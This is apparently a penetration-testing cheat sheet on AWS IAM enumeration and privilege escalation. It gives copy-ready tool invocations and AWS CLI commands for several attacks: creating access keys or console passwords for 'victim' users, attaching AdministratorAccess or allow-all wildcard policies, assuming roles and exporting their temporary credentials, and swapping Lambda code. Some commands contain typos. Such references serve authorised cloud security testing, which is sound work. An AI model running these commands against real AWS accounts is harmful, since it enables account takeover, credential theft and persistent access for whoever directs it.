IAM
IAM privileges - Privesc
Unauthenticated IAM Enumeration
IAM User Accounts
AWeSomeUserFinder
Uses
UpdateAssumeRolePolicyto identify external IAM users.
python3 AWeSomeUserFinder.py -ak <accesskey> -sk <secretkey> -f -r <username list> -rn <role name> -a <account id>Modify S3 bucket policies to enumerate valid IAM users in external accounts
python3 AWeSomeUserFinder.py -ak <accesskey> -sk <secretkey> -f -r <username list> -s3 -b <bucket_name> -a <account id>Pacu
Pacurun iam__enums --role-name <your assumed role> --account-id <account id>IAM Privilege escalation
List inline policies, attached policies and group policies
IAM Enumeration Tools
PMapper
CloudPEASS
python3 AWSPEAS.py --profile <AWS_PROFILE> --region <AWS_REGION>
IAMActionHunter
GitHub - RhinoSecurityLabs/IAMActionHunter: An AWS IAM policy statement parser and query tool.GitHubIAMFinder
EnumerateIAM
python3 enumerate-iam.py --access-key [access_key] --secret-key [secret_key] > results.txtaws_iam_enum
python3 iam-enum.py --user-name [username] --profile [profile]
aws_escalate.py
python3 aws_escalate.py --user-name [username] --access-key-id [access_key] --secret-key [secret_key]Pacu
PacuPrivilege escalation opportunities in IAM configurations
Multiple privesc vectors
Multiple privesc vectors in a single policy
lambda:UpdateFunctionConfiguration
iam:PassRole + ec2:RunInstances: Creating an EC2 instance with an existing instance profile
iam:CreateAccessKey: Creating a new user access key
iam:CreateLoginProfile: Creating a new login profile
iam:UpdateLoginProfile: Updating an existing login profile
iam:AttachUserPolicy: Attaching a policy to a user
iam:AttachGroupPolicy: Attaching a policy to a group
iam:AttachRolePolicy: Attaching a policy to a role
iam:PutUserPolicy: Creating/updating an inline policy for a user
iam:PutGroupPolicy: Creating/updating an inline policy for a group
iam:PutRolePolicy: Creating/updating an inline policy for a role
iam:AddUserToGroup: Adding a user to a group
iam:PassRole + lambda:CreateFunction + lambda:InvokeFunction: Passing a role to a new Lambda function, then invoking it
iam:PassRole + lambda:CreateFunction + lambda:AddPermission
iam:UpdateAssumeRolePolicy + sts:AssumeRole: Updating the AssumeRolePolicyDocument of a role
lambda:UpdateFunctionCode: Updating the code of an existing Lambda function
iam:CreateAccessKey
An attacker with the iam:CreateAccessKey permission on other users can create an access key ID and secret access key belonging to another user in the AWS environment
aws iam create-access-key --user-name target_user
$ aws iam create-access-key --user-name [Victim-Username] --profile [profile-name] --output text | tee creds.txt 
iam:CreateLoginProfile
An attacker with the iam:CreateLoginProfile permission on other users can create a password to use to login to the AWS console on any user that does not already have a login profile setup.
aws iam create-login-profile --user-name [victim-username] --password 'password' --no-password-reset-required --profile [profile]
arn:aws:iam::[Account_ID]:user/[Username]
You can now login as the victim into the AWS console
iam:UpdateLoginProfile
aws iam update-login-profile --user-name [victim-username] --password 'password' --no-password-reset-required --profile [profile]You can now login as the victim into the AWS console - See iam:CreateAccessKey
iam:CreatePolicyVersion
Create a new version of an IAM policy that they have access to.
aws iam create-policy-version --policy-arn arn:aws:iam::123456789012:policy/TargetPolicy --policy-document file://path/to/administrator/policy.json --set-as-defaultadministrator/policy.json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
]
}iam:SetDefaultPolicyVersion
aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2Where “v2” is the policy version with the most privileges available.
Example: CloudGOAT - iam_privesc_by_rollback
With Pacu:
iam:AddUserToGroup
aws iam add-user-to-group --group-name [group-name@ --user-name [username] --profile [profile]iam:AttachUserPolicy
aws iam attach-user-policy --user-name [username] --policy-arn arn:aws:iam::aws:policy/AdministratorAccess If attaching AdministratorAccess fails, try to attach another dangerous permission such as SecretsManagerReadWrite
aws iam attach-user-policy --user-name [username] --policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite iam:AttachGroupPolicy
aws iam attach-group-policy --group-name [group_attached_to_user] --policy-arn arn:aws:iam::aws:policy/SecretsManagerAlso try with AdministratorAccess - See iam:AttachUserPolicy
iam:PutUserPolicy
Create a policy document policy.json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
]
}aws iam put-user-policy --user-name [username] --policy-name test --policy-document file://policy.jsonCheck if the policy is in place:
$ aws iam list-user-policies --user-name [username]
$ aws iam get-user-policy --user-name [username] --policy-name testiam:PutGroupPolicy
Create policy.json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
]
Upload the policy to your group
aws iam put-group-policy --group-name [group] --policy-name admin --policy-document file://policy.jsoniam:AttachRolePolicy
Find a role you can assume: "Action": "sts:AssumeRole"
aws iam list-rolesAttach Role Policy
aws iam attach-role-policy --role-name [role_you_can_assume] --policy-arn arn:aws:iam::aws:policy/AmazonS3FullAccessiam:PutRolePolicy
Find a role you can assume - See iam:AttachRolePolicy
Create policy.json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
]
}Put the role
aws iam put-role-policy --role-name [role_you_can_assume] --policy-name secretsaccess --policy-document file://policy.jsonsts:AssumeRole
List of IAM roles
aws iam list-rolesRetrieve trust relationship between role and user
aws2 iam get-role --role-name [role-name]List managed policies attached to the specified role
aws iam list-attached-role-policies --role-name [role-name]Retrieve information about the specified version of the managed policy
aws iam get-policy-version --policy-arn [policy-arn] --version-id [vid]Assume role - retrieve temporary security credentials of assumed role
aws sts assume-role --role-arn [role-arn] --role-session-name [sessionname]Use the credentials
$ export AWS_ACCESS_KEY_ID=[access_key]
$ export AWS_SECRET_ACCESS_KEY=[secret_key]
$ export AWS_SESSION_TOKEN=[session_token]
$ aws sts get-caller-identitylambda:UpdateFunctionConfiguration
Allow to attach a layer to a function
aws lambda update-function-code --function-name [my-function] --zip-file fileb://my-function.zipiam:PassRole + lambda:CreateFunction + lambda:InvokeFunction
$ aws lambda create-function --function-name [function-name] --runtime python3.7 --zipe-file fileb://my-function.zip --handle [my-function.handler] --role [role-arn] --region [region]
$ aws lambda invoke --function-name [function-name] response.json --region [region]Persistence - IAM Role Anywhere
An attacker with sufficient permissions could exploit IAM Roles Anywhere to gain persistent access to an AWS account
Interesting Book
Interesting BooksAdvanced Penetration Testing: Hacking AWS 2 This book delves deeper into analyzing the security of various AWS services and shows techniques and tactics used by an attacker to breach an AWS environment
Hands-On AWS Penetration Testing with Kali Linux Set up a virtual lab and pentest major AWS services, including EC2, S3, Lambda, and Cloud
Last updated